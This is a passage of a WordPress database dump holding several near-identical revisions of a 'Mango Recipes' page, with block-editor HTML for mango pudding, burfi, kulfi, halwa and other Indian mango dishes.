remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:05:18','2022-02-07 11:35:18','',745,'https://mangomitra.in/?p=813',0,'revision','',0),(815,1,'2022-02-07 17:09:42','2022-02-07 11:39:42','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>1 cup mango cubes</p><p>½ cup milk</p><p>1 cup sugar</p><p>3 cup coconut grated</p><p>¼ tablespoon cardamom powder</p></blockquote>\n<!-- /wp:quote --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:09:42','2022-02-07 11:39:42','',745,'https://mangomitra.in/?p=815',0,'revision','',0),(816,1,'2022-02-07 17:10:26','2022-02-07 11:40:26','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:10:26','2022-02-07 11:40:26','',745,'https://mangomitra.in/?p=816',0,'revision','',0),(818,1,'2022-02-07 17:10:55','2022-02-07 11:40:55','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time : 5 minutes</li><li>Cook Time           : 15 minutes</li><li>Total Time            : 20 minutes</li><li>Servings               : 24 pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango 